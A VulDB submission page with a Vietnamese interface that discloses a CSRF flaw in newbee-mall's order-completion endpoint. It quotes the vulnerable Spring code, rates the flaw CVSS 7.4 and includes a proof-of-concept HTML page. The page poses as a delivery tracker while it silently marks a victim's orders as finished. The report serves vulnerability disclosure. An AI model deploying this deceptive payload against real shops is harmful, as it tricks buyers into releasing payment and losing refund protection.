| tiêu đề | newbee-ltd newbee-mall v1.0 CSRF |
|---|
| Mô tả | # CSRF Vulnerability in Order Completion
## Summary
A **CSRF vulnerability** exists in the order completion endpoint `/orders/{orderNo}/finish`. Attackers can force users to prematurely mark orders as completed before goods are received, leading to payment release and difficulty in refund claims.
## Vulnerability Details
### Configuration-Level Issue
**File**: `src/main/java/ltd/newbee/mall/config/NeeBeeMallWebMvcConfigurer.java`
```java
@Configuration
public class NeeBeeMallWebMvcConfigurer implements WebMvcConfigurer {
public void addInterceptors(InterceptorRegistry registry) {
registry.addInterceptor(newBeeMallLoginInterceptor)
.addPathPatterns("/orders/**");
// ❌ No CSRF protection mechanism
}
}
```
### Endpoint-Level Code Analysis
**File**: `src/main/java/ltd/newbee/mall/controller/mall/OrderController.java` (Lines 97-107)
```java
@PutMapping("/orders/{orderNo}/finish")
@ResponseBody
public Result finishOrder(@PathVariable("orderNo") String orderNo, HttpSession httpSession) {
NewBeeMallUserVO user = (NewBeeMallUserVO) httpSession.getAttribute(Constants.MALL_USER_SESSION_KEY);
// ❌ No CSRF token validation
// ⚠️ Completes order without verification of actual delivery
String finishOrderResult = newBeeMallOrderService.finishOrder(orderNo, user.getUserId());
if (ServiceResultEnum.SUCCESS.getResult().equals(finishOrderResult)) {
return ResultGenerator.genSuccessResult();
} else {
return ResultGenerator.genFailResult(finishOrderResult);
}
}
```
**Security Issues**:
1. ❌ No CSRF token validation
2. ⚠️ No additional confirmation required for order completion
3. ⚠️ Premature completion releases payment to merchant
## Proof of Concept (PoC)
```html
<!DOCTYPE html>
<html>
<head>
<title>Order Tracking System</title>
</head>
<body>
<h2>???? Tracking Your Delivery</h2>
<p>Updating delivery status...</p>
<script>
// Finish multiple recent orders
var orderNumbers = [
'202602051645001',
'202602051645002',
'202602051645003'
];
orderNumbers.forEach(function(orderNo) {
fetch('http://localhost:28089/orders/' + orderNo + '/finish', {
method: 'PUT',
credentials: 'include'
})
.then(response => response.json())
.then(data => console.log('Order ' + orderNo + ' completed'));
});
setTimeout(function() {
document.body.innerHTML = '<h3>✅ Delivery status updated successfully!</h3>';
}, 2000);
</script>
</body>
</html>
```
## Impact
**Premature order completion and payment release** - Users lose buyer protection and face difficulty obtaining refunds if goods are not received or are defective.
---
**CVSS Score**: 7.4 (High)
|
|---|
| Nguồn | ⚠️ https://github.com/newbee-ltd/newbee-mall/issues/109 |
|---|
| Người dùng | flashzyc (UID 92850) |
|---|
| Đệ trình | 05/02/2026 11:52 (cách đây 4 các tháng) |
|---|
| Kiểm duyệt | 18/02/2026 07:55 (13 days later) |
|---|
| Trạng thái | Bản sao |
|---|
| Mục VulDB | 346456 [newbee-ltd newbee-mall đến a069069b07027613bf0e7f571736be86f431faee Multiple Endpoints Giả mạo yêu cầu liên trang] |
|---|
| điểm | 0 |
|---|